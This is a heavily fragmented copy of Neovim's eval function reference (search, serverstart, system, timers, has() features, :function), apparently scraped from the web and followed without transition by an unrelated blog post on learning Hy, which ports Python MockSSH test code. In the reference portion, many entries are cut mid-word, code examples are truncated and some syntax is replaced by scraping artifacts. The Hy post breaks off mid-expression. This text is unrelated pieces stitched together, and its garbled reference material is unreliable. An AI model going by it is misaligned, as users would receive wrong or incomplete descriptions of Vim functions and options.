Number, which is the current screen column of the cursor. The leftmost column has number 1. This function is mainly used for testing. Note: Always returns the current screen column, thus if used in a command (e.g. ":echo screencol()") it will return the column inside the command line, which is 1 when the command is executed. To get the cursor position in the file use one of the following mappings: nnoremap <expr> GG ":echom ".screencol()."\n" nnoremap <silent> GG :echom screencol()<CR> screenrow() *screenrow()* The result is a Number, which is the current screen row of the cursor. The top line has number one. This function is mainly used for testing. Alternatively you can use |winline()|. Note: Same restrictions as with |screencol()|. search({pattern} [, {flags} [, {stopline} [, {timeout}]]]) *search()* Search for regexp pattern {pattern}. The search starts at the cursor position (you can use |cursor()| to set it). When a match has been found its line number is returned. If there is no match a 0 is returned and the cursor doesn't move. No error message is given. 'z' start searching at the cursor column instead of Zero If neither 'w' or 'W' is given, the 'wrapscan' option applies. If the 's' flag is supplied, the '' mark is set, only if the cursor is moved. The 's' flag cannot be combined with the 'n' flag. 'ignorecase', 'smartcase' and 'magic' are used. When the 'z' flag is not given, searching always starts in column zero and then matches before the cursor are skipped. When the 'c' flag is present in 'cpo' the next search starts after the match. Without the 'c' flag the next search starts one column further. milliseconds have passed. Thus when {timeout} is 500 the search stops after half a second. The value must not be negative. A zero value is like not giving the argument. {only available when compiled with the |+reltime| feature} through()* Returns a list of available server names in a list. When there are no servers an empty string is returned. Example: :echo serverlist() {Nvim} *--serverlist* The Vim command-line option `--serverlist` was removed from Nvim, but it can be imitated: nvim --cmd "echo serverlist()" --cmd "q" serverstart([{address}]) *serverstart()* Opens a socket or named pipe at {address} and listens for |RPC| messages. Clients can send |API| commands to the address to control Nvim. Returns the address string. If {address} does not contain a colon ":" it is interpreted as a named pipe or Unix domain socket path. Example: if has('win32') call serverstart('\\.\pipe\nvim-pipe-1234') else call serverstart('nvim.sock') endif If {address} contains a colon ":" it is interpreted as a TCP address where the last ":" separates the host and port. Assigns a random port if it is empty or 0. Supports IPv4/IPv6. Example: :call serverstart('::1:12345') If no address is given, it is equivalent to: :call serverstart(tempname()) |$NVIM_LISTEN_ADDRESS| is set to {address} if not already set. *--servername* The Vim command-line option `--servername` can be imitated: nvim --cmd "let g:server_addr = serverstart('foo')" serverstop({address}) *serverstop()* Closes the pipe or socket at {address}. Does nothing if {address} is empty or invalid. If |$NVIM_LISTEN_ADDRESS| is stopped it is unset. If |v:servername| is stopped it is set to the next available address returned by charsearch({dict}) *setcharsearch()* Set the current character search information to {dict}, which contains one or more of the following entries: char character which will be used for a subsequent |,| or |;| command; an empty string clears the character search forward direction of character search; 1 for forward, 0 for backward until type of character search; 1 for a |t| or |T| character search, 0 for an |f| or |F| character search This can be useful to save/restore a user's character search from a script: :let prevsearch = getcharsearch() :" Perform a command which clobbers user's search :call setcharsearch(prevsearch) Also see |getcharsearch()|.fperm({fname}, {mode}) *setfperm()* *chmod* Set the file permissions for {fname} to {mode}. {mode} must be a string with 9 characters. It is of the form "rwxrwxrwx", where each group of "rwx" flags represent, in turn, the permissions of the owner of the file, the group the file belongs to, and other users. A '-' character means the permission is off, any other character means on. Multi-byte characters are not supported. For example "rw-r-----" means read-write for the user, readable by the group, not accessible by others. "xx-x-----" would do the same thing. Returns non-zero for success, zero for failure. To read permissions see |getfperm()|. setline({lnum}, {text}) *setline()* Set line {lnum} of the current buffer to {text}. To insert lines use |append()|. , 'aaa'], [6, 'bbb'], [7, 'ccc']] : call setline(n, l) :endfor Note: The '[ and '] marks are not set. setloclist({nr}, {list} [, {action}[, {what}]]) *setloclist()* Create or replace or add to the location list for window {nr}. {nr} can be the window number or the |window-ID|. When {nr} is zero the current window is used. For a location list window, the displayed location list is modified. For an invalid window number {nr}, -1 is returned. Otherwise, same as |setqflist()|. Also see |location-list|. If the optional {what} dictionary argument is supplied, then only the items listed in {what} are set. Refer to |setqflist()| for the list of supported keys in {what}. or five numbers: [bufnum, lnum, col, off] [bufnum, lnum, col, off, curswant] . The "curswant" number is only used when setting the cursor position. It sets the preferred column for when moving the cursor vertically. When the "curswant" number is missing the preferred column is not set. When it is present and setting a mark position it is not used. Note that for '< and '> changing the line number may result in the marks to be effectively be swapped, so that '< is always before '>. Returns 0 when the position could be set, -1 otherwise. An error message is given if {expr} is invalid. Also see |getpos()| and |getcurpos()|. This does not restore the preferred column for moving vertically; if you set the cursor position with this, |j| and |k| motions will jump to previous columns! Use |cursor()| to also set the preferred column. Also see the "curswant" key in |winrestview()|. setqflist({list} [, {action}[, {what}]]) . *E927*}. This can also be used to clear the list: :call setqflist([], 'r') If {action} is not present or is set to '' '', then a new list is created. If {title} is given, it will be used to set |w:quickfix_title| after opening the quickfix window. If the optional {what} dictionary argument is supplied, then only the items listed in {what} are set. The first {list} argument is ignored. The following items can be specified in {what}: nr list number in the quickfix stack title quickfix list title text Unsupported keys in {what} are ignored. If the "nr" item is not present, then the current quickfix list is modified. Examples: :call setqflist([], 'r', {'title': 'My search'}) :call setqflist([], 'r', {'nr': 2, 'title': 'Errors'})}. {value} may be any value returned by |getreg()|, including a |List|. "u" or '"'', then the unnamed register is set to point to register {regname}. If {options} contains no register settings, then the default is to use character mode unless {value} ends in a <NL> for string {value} and linewise mode for list {value}. Blockwise mode is never selected automatically. Returns zero for success, non-zero for failure. *E883* Note: you may not use |List| containing more than one item to set search and expression registers. Lists containing no items act like empty strings. Examples: :call setreg(v:register, @*) :call setreg('*', @%, 'ac') :call setreg('a', "1\n2\n3", 'b5') This example shows using the functions to save and restore a register (note: you may not reliably restore register value without using the third argument to |getreg()| as without it newlines are represented as newlines AND Nul bytes are represented as newlines as well, see |NL-used-for-Nul|). :let var_a = getreg('a',()|. {winnr} can be the window number or the |window-ID|.") sha256({string}) *sha256()* Returns a String with 64 hex characters, which is the SHA256 checksum of {string}. shellescape({string} [, {special}]) *shellescape()* Escape {string} for use as a shell command argument. On Windows when 'shellslash' is not set, it will enclose {string} in double quotes and double all double quotes within {string}. Otherwise,("%"))) See also |::S|. shiftwidth() *shiftwidth()* Returns the effective value of 'shiftwidth'. This is the 'shiftwidth' value unless it is zero, in which case it is the 'tabstop' value. To be backwards compatible in indent plugins, use this: if exists('*shiftwidth') func s:sw() return shiftwidth() endfunc else func s:sw() return &sw endfunc endif And then use s:sw() instead of &sw. sockconnect({mode}, {address}, {opts}) *sockconnect()* Connect a socket to an address. If {mode} is "pipe" then {address} should be the path of a named pipe. If {mode} is "tcp" then {address} should be of the form "host:port" where the host should be an ip adderess or host name, and port the port number. Currently only rpc sockets are supported, so {opts} must be passed with "rpc" set to |TRUE|. {opts} is a dictionary with these keys: rpc : If set, |msgpack-rpc| will be used to communicate over the socket. Returns: - The channel ID on success, which is used by |rpcnotify()| and |rpcrequest()| and |rpcstop()|. - 0 on invalid arguments or connection failure. sort({list} [, {func} [, {dict}]]) *sort()* *E702* Sort the items in {list} in-place. Returns {list}. If you want a list to remain unmodified make a copy first: :let sortedlist = sort(copy(mylist)) When {func} is omitted, is empty or zero, then sort() uses the string representation of each item to sort on. Numbers sort after Strings, |Lists| after Numbers. For sorting text in the current buffer use |:sort|. When {func} is given and it is '1' or 'i' then case is ignored. When {func} is given and it is 'n' then all items will be sorted numerical (Implementation detail: This uses the strtod() function to parse numbers, Strings, Lists, Dicts and Funcrefs will be considered as being 0). When {func} is given and it is 'N' then all items will be sorted numerical. This is like 'n' but a string containing digits will be used as the number they represent. When {func} is given and it is 'f' then all items will be sorted numerical. All values must be a Number or a Float.. {dict} is for functions with the "dict" attribute. It will be used to set the local variable "self". |Dictionary-function| The sort is stable, items which compare equal (as number or as string) will keep their relative position. E.g., when sorting on numbers, text strings will sort next to each other, in the same order as they were originally. Also see |uniq()|.. 'ignorecase' is not used here, add \c to ignore case. |/\c|' at the end of the pattern: ')) str2nr({expr} [, {base}]) *str2nr()* Convert string {expr} to a number. {base} is the conversion base, it can be. Similarly, when {base} is 8 a leading "0" is ignored, and when {base} is 2 a leading "0b" or "0B" is ignored. Text after the number is silently ignored. strchars({expr} [, {skipcc}]) *strchars()* The result is a Number, which is the number of characters in String {expr}. When {skipcc} is omitted or zero, composing characters are counted separately. When {skipcc} set to 1, Composing characters are ignored. Also see |strlen()|, |strdisplaywidth()| and |strwidth()|. {skipcc} is only available after 7.4.755. For backward compatibility, you can define a wrapper function: if has("patch-7.4.755") function s:strchars(str, skipcc) return strchars(a:str, a:skipcc) endfunction else function s:strchars(str, skipcc) if a:skipcc return strlen(substitute(a:str, ".", "x", "g")) else return strchars(a:str) endif endfunction endif strcharpart({src}, {start}[, {len}]) *strcharpart()* Like |strpart()| but using character index and length instead of byte index and length. When a character index is used where a character does not exist it is assumed to be one character. For example: strcharpart('abc', -1, 2) results in 'a'. strdisplaywidth({expr}[, {col}]) *strdisplaywidth()* The result is a Number, which is the number of display cells String {expr} occupies on the screen when it starts at {col}.getchar({str}, {index}) *strgetchar()* Get character {index} from {str}. This uses a character index, not a byte index. Composing characters are considered separate characters here. Also see |strcharpart()| and |strchars()|. or `str2float('inf')` Funcref `function('name')` List [item, item] Dictionary {key: value, key: value} Note that in String values the '' character is doubled. Also see |strtrans()|. Note 2: Output format is mostly compatible with YAML, except for infinite and NaN floating-point values representations which use |str2float()|. Strings are also dumped literally, only single quote is escaped, which does not allow using YAML for parsing back binary strings. |eval()| should always work for strings and floats though and this is the only official method, use |msgpackdump()| or |json_encode()| if you need to share data with other application. *strlen()* strlen({expr}) The result is a Number, which is the length of the String {expr} in bytes. If the argument is a Number it is first converted to a String. For other types an error is given. If you want to count the number of multi-byte characters use |strchars()|. Also see |len()|, |strdisplaywidth()| and |strwidth()|. strpart({src}, {start}[, {len}]) *strpart()* The result is a String, which is part of {src}, starting from byte {start}, with the byte length {len}. To count characters instead of bytes use |strcharpart()|. When bytes are selected which do not exist,}[, {list}]) *submatch()* *E935* Only for an expression in a |:substitute| command or substitute() function. Returns the {nr}'th submatch of the matched text. When {nr} is 0 the whole matched text is returned. Note that a NL in the string can stand for a line break of a multi-line match or a NUL character in the text. Also see |sub-replace-expression|. If {list} is present and non-zero then submatch() returns a list of strings, similar to |getline()| with two arguments. NL characters in the text represent NUL characters in the text. Only returns more than one item for |:substitute|, inside |substitute()| this list will always contain one or zero items, since there are no real line breaks. When substitute() is used recursively only the submatches in the current (deepest) call can be obtained.}. When {flags} is "g", all matches of {pat} in {expr} are replaced. Otherwise {flags} should be "". This works like the ":substitute" command (without any flags). But the matching with {pat} is always done like the 'magic' option is set and 'cpoptions' is empty (to make scripts portable). 'ignorecase' is still relevant, use |/\c| or |/\C| if you want to ignore or match case and ignore 'ignorecase'. 'smartcase' is not used. See |string-match| for how {pat} is used. A "~" in {sub} is not replaced with the previous {sub}. Note that some codes in {sub} have a special meaning |sub-replace-special|. For example, to replace something with "\n" (two characters), use "\\\\n" or '\\n'. When {pat} does not match in {expr}, {expr} is returned unmodified. Example: :let &path = substitute(&path, ",\\=[^,]*$", "", "") This removes the last component of the 'path' option. :echo substitute("testing", ".*", "\\U\\0", "") results in "TESTING". When {sub} starts with "\=", the remainder is interpreted as an expression. See |sub-replace-expression|. Example: :echo substitute(s, '%\(\x\x\)', \ '\=nr2char("0x" . submatch(1))', 'g') When {sub} is a Funcref that function is called, with one optional argument. Example: :echo substitute(s, '%\(\x\x\)', SubNr, 'g') The optional argument is a list which contains the whole matched string and up to nine submatches,like what |submatch()| returns. Example: :echo substitute(s, '\(\x\x\)', {m -> '0x' . m[1]}, 'g'). Note that when the position is after the last character, that's where the cursor can be in Insert mode, synID() returns zero. When {trans} is |TRUE|, transparent items are reduced to the item that they reveal. This is useful when wanting to know the effective color. When {trans} is |FALSE|,({cmd} [, {input}]) *system()* *E677* Get the output of {cmd} as a |string| (use |systemlist()| to get a |List|). {cmd} is treated exactly as in |jobstart()|. Not to be used for interactive commands. If {input} is a string it is written to a pipe and passed as stdin to the command. The string is written as-is, line separators are not changed. If {input} is a |List| it is written to the pipe as |writefile()| does with {binary} set to "b" (i.e. with a newline between each list item, and newlines inside list items converted to NULs). *E5677* Note: system() cannot write to or read from backgrounded ("&") shell commands, e.g.: :echo system("cat - &", "foo")) which is equivalent to: $ echo foo | bash -c 'cat - &' The pipes are disconnected (unless overridden by shell redirection syntax) before input can reach it. Use |jobstart()| instead. Note: Use |shellescape()| or |::S| with |expand()| or |fnamemodify()| to escape special characters in a command argument. Newlines in {cmd} may cause the command to fail. The characters in 'shellquote' and 'shellxquote' may also cause trouble. The result is a String. Example: :let files = system("ls " . shellescape(expand('%:h'))) :let files = system('ls ' . expand('%:h:S')) To make the result more system-independent, the shell output is filtered to replace <CR> with <NL> for Macintosh, and <CR><NL> with <NL> for DOS-like systems. To avoid the string being truncated at a NUL, all NUL characters are replaced with SOH (0x01). The command executed is constructed using several options when {cmd} is a string: 'shell' 'shellcmdflag' {cmd}. systemlist({cmd} [, {input} [, {keepempty}]]) *systemlist()* Same as |system()|, but returns a |List| with lines (parts of output separated by NL) with NULs transformed into NLs. Output is the same as |readfile()| will output with {binary} argument set to "b", except that a final newline is not preserved, unless {keepempty} is non-zero. Note that on MS-Windows you may get trailing CR characters. Returns an empty string on error. tabpagebuflist([{arg}]) *tabpagebuflist()* The result is a |List|, where each item is the number of the buffer associated with each window in the current tab page. {arg} specifies the number of the tab page to be used. When omitted the current tab page is used. When {arg} is invalid the number zero is returned. To get a list of all buffers in all tabs use this: let buflist = [] for i in range(tabpagenr('$')) call extend(buflist,}[, {filename}]) *taglist()* Returns a list of tags matching the regular expression {expr}. If {filename} is passed it is used to prioritize the results in the same way that |:tselect| does. See |tag-priority|. {filename} should be the full path of the file.}. This also make the function work faster.. Example: :let tmpfile = tempname() :exe "redir > " . tmpfile For Unix, the file will be in a private directory |tempfile|. For MS-Windows forward slashes are used when the 'shellslash' option is set or when 'shellcmdflag' starts with '-'. termopen({cmd}[, {opts}]) {Nvim} *termopen()* Spawns {cmd} in a new pseudo-terminal session connected to the current buffer. {cmd} is the same as the one passed to |jobstart()|. This function fails if the current buffer is modified (all buffer contents are destroyed). The {opts} dict is similar to the one passed to |jobstart()|, but the `pty`, `width`, `height`, and `TERM` fields are ignored: `height`/`width` are taken from the current window and `$TERM` is set to "xterm-256color". Returns the same values as |jobstart()|. See |terminal| for more information. test_garbagecollect_now() *test_garbagecollect_now()* Like garbagecollect(), but executed right away. This must only be called directly to avoid any structure to exist internally, and |v:testing| must have been set before calling any function. tan({expr}) *tan()* Return the tangent of {expr}, measured in radians, as a |Float| in the range [-inf, inf]. {expr} must evaluate to a |Float| or a |Number|. Examples: :echo tan(10) 0.648361 :echo tan(-4.01) -1.181502 tanh({expr}) *tanh()* Return the hyperbolic tangent of {expr} as a |Float| in the range [-1, 1]. {expr} must evaluate to a |Float| or a |Number|. Examples: :echo tanh(0.5) 0.462117 :echo tanh(-1) -0.761594 *timer_info()* timer_info([{id}]) Return a list with information about timers. When {id} is given only information about this timer is returned. When timer {id} does not exist an empty list is returned. When {id} is omitted information about all timers is returned. For each timer the information is stored in a Dictionary with these items: "id" the timer ID "time" time the timer was started with "repeat" number of times the timer will still fire; -1 means forever "callback" the callback timer_pause({timer}, {paused}) *timer_pause()* Pause or unpause a timer. A paused timer does not invoke its callback when its time expires. Unpausing a timer may cause the callback to be invoked almost immediately if enough time has passed. Pausing a timer is useful to avoid the callback to be called for a short time. If {paused} evaluates to a non-zero Number or a non-empty String, then the timer is paused, otherwise it is unpaused. See |non-zero-arg|. *timer_start()* *timer* *timers* timer_start({time}, {callback} [, {options}]) Create a timer and return the timer ID. {time} is the waiting time in milliseconds. This is the minimum time before invoking the callback. When the system is busy or Vim is not waiting for input the time will be longer. {callback} is the function to call. It can be the name of a function or a |Funcref|. It is called with one argument, which is the timer ID. The callback is only invoked when Vim is waiting for input. {options} is a dictionary. Supported entries: "repeat" Number of times to repeat calling the callback. -1 means forever. When not present the callback will be called once. Example: func MyHandler(timer) echo 'Handler called' endfunc let timer = timer_start(500, 'MyHandler', \ {'repeat': 3}) This will invoke MyHandler() three times at 500 msec intervals. timer_stop({timer}) *timer_stop()* Stop a timer. The timer callback will no longer be invoked. {timer} is an ID returned by timer_start(), thus it must be a Number. If {timer} does not exist there is no error. timer_stopall() *timer_stopall()* Stop all timers. The timer callbacks will no longer be invoked. Useful if some timers is misbehaving. If there are no timers there is no type({expr}) *type()* The result is a Number representing the type of {expr}. Instead of using the number directly, it is better to use the v:t_ variable that has the value: Number: 0 (|v:t_number|) String: 1 (|v:t_string|) Funcref: 2 (|v:t_func|) List: 3 (|v:t_list|) Dictionary: 4 (|v:t_dict|) Float: 5 (|v:t_float|) Boolean: 6 (|v:true| and |v:false|) Null: 7 (|v:null|) For backward compatibility, this method can be used: :if type(myvar) == type(0) :if type(myvar) == type("") :if type(myvar) == type(function("tr")) :if type(myvar) == type([]) :if type(myvar) == type({}) :if type(myvar) == type(0.0) :if type(myvar) == type(v:true) In place of checking for |v:null| type it is better to check for |v:null| directly as it is the only value of this type: :if myvar is v:null To check if the v:t_ variables exist use this: :if exists('v:t_number'). If {name} is empty undofile() returns an empty string, since a buffer without a file name will not write an undo file.. uniq({list} [, {func} [, {dict}]]) *uniq()* *E882* Remove second and succeeding copies of repeated adjacent {list} items in-place. Returns {list}. If you want a list to remain unmodified make a copy first: :let newlist = uniq(copy(mylist)) The default compare function uses the string representation of each item. For the use of {func} and {dict} see |sort()|.. |conceal| is ignored. "off" is omitted zero is used.|). If [expr] is supplied and it evaluates to a non-zero Number or a non-empty String, then the Visual mode will be cleared and the old value is returned. See |non-zero-arg|. wildmenumode() *wildmenumode()* Returns |TRUE| when the wildmenu is active and |FALSE| otherwise. See 'wildmenu' and 'wildmode'. This can be used in mappings to handle the 'wildcharm' option gracefully. (Makes only sense with |mapmode-c| mappings). For example to make <c-j> work like <down> in wildmode, use: :cnoremap <expr> <C-j> wildmenumode() ? "\<Down>\<Tab>" : "\<c-j>" (Note, this needs the 'wildcharm' option set appropriately). win_findbuf({bufnr}) *win_findbuf()* Returns a list with |window-ID|s for windows that contain buffer {bufnr}. When there is none the list is empty. win_getid([{win} [, {tab}]]) *win_getid()* Get the |window-ID| for the specified window. When {win} is missing use the current window. With {win} this is the window number. The top window has number 1. Without {tab} use the current tab, otherwise the tab with number {tab}. The first tab has number one. Return zero if the window cannot be found. win_gotoid({expr}) *win_gotoid()* Go to window with ID {expr}. This may also change the current tabpage. Return 1 if successful, 0 if the window cannot be found. win_id2tabwin({expr} *win_id2tabwin()* Return a list with the tab number and window number of window with ID {expr}: [tabnr, winnr]. Return [0, 0] if the window cannot be found. win_id2win({expr}) *win_id2win()* Return the window number of window with ID {expr}. Return 0 if the window cannot be found in the current tabpage. *winbufnr()* winbufnr({nr}) The result is a Number, which is the number of the buffer associated with window {nr}. {nr} can be the window number or the |window-ID|.}. {nr} can be the window number or the |window-ID|.). let window_count = winnr('$')()| and |win_getid()|. . Note: The {dict} does not have to contain all values, that are returned by |winsaveview()|. If values are missing, those settings won't be restored. So you can use: :call winrestview({'curswant': 4}) This will only set the curswant value (the column the cursor wants to move on vertical movements) of the cursor to column 5 (yes, that is 5), while all other settings will remain the same. This is useful, if you set the cursor position manually.. This may have side effects. The return value includes: lnum cursor line number col cursor column (Note: the first column zero, as opposed to what getpos()}. {nr} can be the window number or the |window-ID|. For getting the terminal or screen size, see the 'columns' option. wordcount() *wordcount()* The result is a dictionary of byte/chars/word statistics for the current buffer. This is the same info as provided by |g_CTRL-G| The return value includes: bytes Number of bytes in the buffer chars Number of chars in the buffer words Number of words in the buffer cursor_bytes Number of bytes before cursor position (not in Visual mode) cursor_chars Number of chars before cursor position (not in Visual mode) cursor_words Number of words before cursor position (not in Visual mode) visual_bytes Number of bytes visually selected (only in Visual mode) visual_chars Number of chars visually selected (only in Visual mode) visual_words Number of chars visually selected (only in Visual mode) *writefile()* writefile({list}, {fname} [, {flags}]) Write |List| {list} to file {fname}. Each list item is separated with a NL. Each list item must be a String or Number. When {flags} contains "b" then binary mode is used: There will not be a NL after the last list item. An empty item at the end does cause the last line in the file to end in a NL. When {flags} contains "a" then append mode is used, lines are appended to the file: :call writefile(["foo"], "event.log", "a") :call writefile(["bar"], "event.log", "a") When {flags} contains "S" fsync() call is not used, with "s" it is used, 'fsync' option applies by default. No fsync() means that writefile() will finish faster, but writes may be left in OS buffers and not yet written to disk. Such changes will disappear if system crashes before OS does writing.") xor({expr}, {expr}) *xor()* Bitwise XOR on the two arguments. The arguments are converted to a number. A List, Dict or Float argument causes an error. Example: :let bits = xor(bits, 0x80) *feature-list* There are four types of features: 1. Features that are only supported when they have been enabled when Vim was compiled |+feature-list|. Example: :if has("cindent") 2. Features that are only supported when certain conditions have been met. Example: :if has("win32") *has-patch* 3. {Nvim} version. The "nvim-1.2.3" feature means that the Nvim version is 1.2.3 or later. Example: :if has("nvim-1.2.3") 4. Included patches. The "patch123" feature means that patch 123 has been included. Note that this form does not check the version of Vim, you need to inspect |v:version| for that. Example (checking version 6.2.148 or later): :if v:version > 602 || v:version == 602 && has("patch148") Note that it's possible for patch 147 to be omitted even though 148 is included. 5. Beyond a certain version or at a certain version and including a specific patch. The "patch-7.4.237" feature means that the Vim version is 7.5 or later, or it is version 7.4 and patch 237 was included. Note that this only works for patch 7.4.237 and later, before that you need to use the example above that checks v:version. Example: :if has("patch-7.4.248") Note that it's possible for patch 147 to be omitted even though 148 is included. Hint: To find out if Vim supports backslashes in a file name (MS-Windows), use: `if exists('+shellslash')` acl Compiled with |ACL| support. arabic Compiled with Arabic support |Arabic|. autocmd Compiled with autocommand support. |autocommand| browse Compiled with |:browse| support, and browse() will work. browsefilter Compiled with support for |browsefilter|. byte_offset Compiled with support for 'o' in 'statusline' cindent Compiled with 'cindent' support. clipboard Compiled with 'clipboard' support. cmdline_compl Compiled with |cmdline-completion| support. cmdline_hist Compiled with |cmdline-history| support. cmdline_info Compiled with 'showcmd' and 'ruler' support. comments Compiled with |'comments'| support. cscope Compiled with |cscope| support. debug Compiled with "DEBUG" defined. dialog_con Compiled with console dialog support. digraphs Compiled with support for digraphs. eval Compiled with expression evaluation support. Always true, of course! ex_extra |+ex_extra|, always true now Windows this is not present). folding Compiled with |folding| support. gettext Compiled with message translation |multi-lang| iconv Can use iconv() for conversion. insert_expand Compiled with support for CTRL-X expansion commands in Insert mode. jumplist Compiled with |jumplist| support. keymap Compiled with 'keymap' support. lambda Compiled with |lambda| support. langmap Compiled with 'langmap' support. libcall Compiled with |libcall()| support. linebreak Compiled with 'linebreak', 'breakat', 'showbreak' and 'breakindent' support. lispindent Compiled with support for lisp indenting. listcmds Compiled with commands for the buffer list |:files| and the argument list |arglist|. localmap Compiled with local mappings and abbr. |:map-local| mac macOS version of Vim. menu Compiled with support for |:menu|. mksession Compiled with support for |:mksession|. modify_fname Compiled with file name modifiers. |filename-modifiers| mouse Compiled with support mouse. mouseshape Compiled with support for 'mouseshape'. multi_byte Compiled with support for 'encoding' multi_byte_encoding 'encoding' is set to a multi-byte encoding. multi_lang Compiled with support for multiple languages. num64 Compiled with 64-bit |Number| support. nvim This is Nvim. |has-patch| path_extra Compiled with up/downwards search in 'path' and 'tags' persistent_undo Compiled with support for persistent undo history. postscript Compiled with PostScript file printing. printer Compiled with |:hardcopy| support. profile Compiled with |:profile| support. python Legacy Vim Python 2.x API is available. |has-python| python3 Legacy Vim Python 3.x API is available. |has-python| quickfix Compiled with |quickfix| support. reltime Compiled with |reltime()| support. rightleft Compiled with 'rightleft' support. scrollbind Compiled with 'scrollbind' support. shada Compiled with shada support. showcmd Compiled with 'showcmd' support. signs Compiled with |:sign| support. smartindent Compiled with 'smartindent' support. spell Compiled with spell checking support |spell|. startuptime Compiled with |--startuptime| support. statusline Compiled with support for 'statusline', 'rulerformat' and special formats of 'titlestring' and 'iconstring'. syntax Compiled with syntax highlighting support |syntax|. syntax_items There are active syntax highlighting items for the current buffer. tablineat 'tabline' option accepts %@[email protected] items. tag_binary Compiled with binary searching in tags files |tag-binary-search|. tag_old_static Compiled with support for old static tags |tag-old-static|. tag_any_white Compiled with support for any white characters in tags files |tag-any-white|. termresponse Compiled with support for |t_RV| and |v:termresponse|. textobjects Compiled with support for |text-objects|. timers Compiled with |timer_start()| support. title Compiled with window title support |'title'|. unix Unix version of Vim. unnamedplus Compiled with support for "unnamedplus" in 'clipboard' user_commands User-defined commands. vertsplit Compiled with vertically split windows |:vsplit|. vim_starting True while initial source'ing takes place. |startup| *vim_starting* virtualedit Compiled with 'virtualedit' option. visual Compiled with Visual mode. visualextra Compiled with extra Visual mode commands. |blockwise-operators|. vreplace Compiled with |gR| and |gr| commands. wildignore Compiled with 'wildignore' option. wildmenu Compiled with 'wildmenu' option. win32 Windows version of Vim (32 or 64 bit). winaltkeys Compiled with 'winaltkeys' option. windows Compiled with support for more than one window. writebackup Compiled with 'writebackup' default on. . There are only script-local functions, no buffer-local or window-local functions. ** *E853* *E884* :fu[nction][!] {name}([arguments]) [range] [abort] [dict] [closure] Define a new function by the name {name}. The name must be made of alphanumeric characters and '_', and must start with a capital or "s:" (see above). Note that using "b:" or "g:" is not allowed. (since patch 7.4.260 E884 is given if the function name has a colon in the name, e.g. for "foo:bar()". Before that patch no error was|. *:func-range* |. The cursor is still moved to the first line of the range, as is the case with all Ex commands. *:func-abort* When the [abort] argument is added, the function will abort as soon as an error is detected. *:func-dict* When the [dict] argument is added, the function must be invoked through an entry in a |Dictionary|. The local variable "self" will then be set to the dictionary. See |Dictionary-function|. *:func-closure* *E932* When the [closure] argument is added, the function can access variables and arguments from the outer scope. This is usually called a closure. In this example Bar() uses "x" from the scope of Foo(). It remains referenced even after Foo() returns: :function! Foo() : let x = 0 : function! Bar() closure : let x += 1 : return x : endfunction : return funcref('Bar') :endfunction :let F = Foo() :echo F() 1 :echo F() 2 :echo F() 3 * *E933* composite type is used, such as |List| or |Dictionary| , local variables can be used. These "~/.config/nvim* In most places where)". This does NOT work: :let i = 3 :let @{i} = '' " error :echo @{i} " error ==============================================================================* *:[email protected]*' This also works for terminal codes in the form t_xx. But only for alphanumerical names. Example: :let &t_k1 = "\<Esc>[234;" When the code does not exist yet it will be created as a terminal key code, there is no error. * *E940* If you try to change a locked variable you get an error message: "E741: Value is locked: {name}". If you try to lock or unlock a built-in variable you will get an error message "E940: Cannot lock or unlock variable {name}". backward}. Information about the exception is available in |v:exception|. Also see |throw-variables|." *:echo-self-refer* When printing nested containers echo prints second occurrence of the self-referencing container using "[[email protected]]" (self-referencing |List|) or "{[email protected]}" (self-referencing |Dict|): :let l = [] :call add(l, l) :let l2 = [] :call add(l2, [l2]) :echo l l2 echoes "[[[email protected]]] [[[[email protected]]]]". Echoing "[l]" will echo "[[[[email protected]]]]" because l first occurs at second level. *(filename, 1) Note: The executed string may be any command-line, but starting or ending "if", "while" and "for" does not always work, because when commands are skipped the ":execute" is not evaluated and Vim loses track of where blocks start and end. Also "break" and "continue" should not be inside ":execute". This example does not work, because the ":execute" is not evaluated and Vim does not see the "while", and gives an error for finding an ":endwhile": :if 0 : execute 'while i > 5' : echo "test" : endwhile :endif .nvim
https://neovim.io/doc/user/eval.html
CC-MAIN-2017-43
refinedweb
12,521
66.54
It's been a long time since I've been wanting to learn a Lisp, probably a few years ago after becoming an Emacs user but that's another story... I wrote a little bit of elisp and clisp over the years for the sake of trying them but never had a strong motivation or need to learn them and it stayed like that until I discovered Hy. This time around teaching myself a Lisp is not only really fun but also conveniently familiar as it has a Python back-end I already know and the standard Python modules I regularly use. Yeah, it runs in Python so you can run Python from it! (import MockSSH) (defclass command-en [MockSSH.SSHCommand] "Prompt for and validate a password" [[start (fn [self] (setv self.password (bytes "")) (setv self.required_password (bytes "1234")) (.write self (bytes "Password: ")) (setv self.callbacks [self.validate-password]))] [lineReceived (fn [self line] (setv self.password (bytes line)) ((first self.callbacks)))] [validate-password (fn [self] (if (!= self.password "") (do (if (= self.password self.required_password) (do (setv self.protocol.prompt (bytes "hostname#")) (setv self.protocol.password_input False))) (if (!= self.password self.required_password) (do (.writeln self (bytes (.join " " ["MockSSH: password is" self.required_password]))) (setv self.protocol.password_input False))) (.exit self))))]]) (setv commands {"en" command-en}) (setv prompt (bytes "hostname>")) (setv keypath ".") (setv interface "127.0.0.1") (setv port 2222) (setv users {"testuser" "1234"}) (apply MockSSH.runServer [commands prompt keypath interface port] users) Here is the previous code before it was translated to Hy: import MockSSH users = {'testuser': '1234'} class command_en(MockSSH.SSHCommand): """Prompt for and validate a password """ def start(self): self.this_password = "1234" self.password = "" self.write("Password: ") self.protocol.password_input = True self.callbacks = [self.validatePassword] def lineReceived(self, line): self.password = line.strip() self.callbacks.pop(0)() def validatePassword(self): if self.password: if self.password == self.this_password: self.protocol.prompt = "hostname#" self.protocol.password_input = False else: self.writeln("MockSSH: password is %s" % self.this_password) self.protocol.password_input = False self.exit() commands = {'en': command_en} MockSSH.runServer(commands, prompt="hostname>", interface='127.0.0.1', port=2222, **users) Looking at these examples I still felt like Python's syntax was lighter but comparing two pieces of code, that do the same thing, in different languages, and using the same module to do it forced me to think it through and see things from a different perspective, which is pretty cool. In fact seeing how bad it looked in Hy gave me a much better view of how bad the Python implementation really was and although I never really liked it, I never really saw until now in how many ways it could be simplified... so I started moving things around in it and brought the previous code, to this: (import MockSSH) (setv users {"testuser" "1234"}) (defn mock-ssh [users commands host port prompt keypath] ;; replace with optional arguments (apply MockSSH.runServer [commands (bytes prompt) keypath (bytes host) port] users)) (defn en-change-protocol-prompt [instance] (setv instance.protocol.prompt (bytes "hostname#"))) (defn en-write_password_to_transport [instance] (.writeln instance (bytes (.join "" ["MockSSH: password is `" instance.valid_password "'"])))) (setv password-prompting-command (apply MockSSH.PasswordPromptingCommand [] {"password" (bytes "1234") "password_prompt" (bytes "Password: ") "success_callbacks" [en-change-protocol-prompt] "failure_callbacks" [en-write-password-to-transport]})) (setv commands 